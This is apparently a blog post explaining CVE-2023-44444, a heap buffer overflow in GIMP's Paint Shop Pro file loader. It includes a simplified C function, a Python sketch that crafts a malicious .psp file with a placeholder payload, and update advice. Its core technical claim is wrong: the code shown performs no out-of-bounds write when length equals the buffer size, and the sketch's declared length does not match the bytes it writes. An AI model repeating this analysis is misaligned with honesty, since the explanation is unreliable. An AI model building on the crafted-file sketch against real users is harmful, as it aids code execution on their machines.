A newly disclosed security flaw, CVE-2023-44444, has put users of the popular image editing software GIMP at risk. This vulnerability allows attackers to execute their code on your machine, potentially taking it over, just by letting you open a booby-trapped image.
What Is CVE-2023-44444?
CVE-2023-44444 is an off-by-one heap buffer overflow bug in GIMP's code responsible for parsing PSP (Paint Shop Pro) files. If you open a specially crafted PSP file (or visit a web page that opens such a file using GIMP), the attacker can execute arbitrary code with the same rights as you on your computer.
> Short version:
> If you open a malicious .psp file, an attacker can completely compromise your system using GIMP.
Vulnerable Software: GIMP (tested on multiple versions)
- Discovered by: Zero Day Initiative (ZDI), ZDI-CAN-22097
- CVE Reference: CVE-2023-44444 entry on NVD
How Does the Attack Work?
The vulnerability sits in the part of GIMP that deals with loading PSP image files. Here’s what happens:
While checking the length, a one-byte overflow occurs due to a faulty check.
- The attacker can control what gets written just past the end of the buffer—smashing adjacent memory.
With luck and skill, this lets the attacker take over the program's execution flow.
User interaction is required:
This is NOT a "drive-by" attack—you must open a malicious file (downloaded, emailed, or fetched from a web page) for the exploit to trigger.
The buggy function (simplified for clarity)
void psp_read_channel_data(FILE *fp, uint8_t *buffer, size_t buffersz) {
size_t length = psp_get_length_from_file(fp);
/* The flaw: insufficient check, off by one */
if (length > buffersz) {
/* Not enough space in buffer */
return;
}
fread(buffer, 1, length, fp); // length == buffersz is allowed!
...
}
Here's the key: when length == buffersz, fread() writes up to buffer+buffersz, thus overrunning the buffer by 1 byte.
That single byte lets attackers overwrite critical structures in memory—setting up a controlled code execution (for example, flipping a pointer or changing control data).
Proof of concept exploit sketch
Make a .psp file with a header that specifies length = buffersz, plus next few bytes positioning attacker payload after the buffer.
...since writing a full weaponized exploit is dangerous and outside of ethical bounds, here’s a snippet showing the kind of file structure:
with open("evil.psp", "wb") as f:
# Write valid PSP header (simplified)
f.write(b"Paint Shop Pro Image File\x00") # Magic
# Craft section specifying data length one byte too long
buffer_size = 256
f.write(buffer_size.to_bytes(4, 'little')) # Fake header for length
# Write data that fills the buffer, plus an extra byte (the overflow)
f.write(b"A" * buffer_size)
f.write(b"\x41") # Single byte overflow: AA..AA|41
# Place fake next-structure or code pointer here for advanced ROP/etc.
f.write(b"PAYLOADGOESHERE")
Open this file in a vulnerable GIMP, and the off-by-one overwrite occurs—*what happens next is up to the attacker's payload and system state*.
Details from the Wild
- Zero Day Initiative advisory: ZDI-24-306
- CVE listing: CVE-2023-44444
- GIMP Bugzilla: Bug 798600 - heap buffer overflow, psp plugin (if public)
How To Stay Safe
- Update GIMP ASAP: Upgrade to the latest patched version (get it here).
Summary
CVE-2023-44444 is a dangerous remote code execution bug affecting GIMP users.
Just opening a single malicious .psp file can let an attacker run code on your PC. The bug comes from a simple off-by-one error in how GIMP reads PSP files, leaving almost every unpatched GIMP install at risk.
References
- ZDI-24-306: Remote Code Execution Vulnerability in GIMP PSP Plugin
- National Vulnerability Database: CVE-2023-44444
- GIMP Official Website
*This post was created exclusively for educational and preventive purposes. Always update your software and be wary of opening strange files.*
Timeline
Published on: 05/03/2024 03:16:00 UTC
Last modified on: 05/03/2024 12:48:41 UTC